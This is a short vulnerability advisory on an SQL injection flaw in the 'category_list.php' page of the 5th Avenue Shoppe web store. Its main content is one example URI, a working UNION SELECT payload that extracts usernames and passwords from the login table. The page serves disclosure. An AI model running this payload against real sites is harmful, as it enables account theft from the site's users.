5th Avenue Shoppe 'category_list.php' SQL Injection Vulnerability

info
discussion
exploit
solution
references

5th Avenue Shoppe 'category_list.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/category_list.php?category_ID=-1/**/UNION/**/SELECT/**/1,username,password,4,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/login/*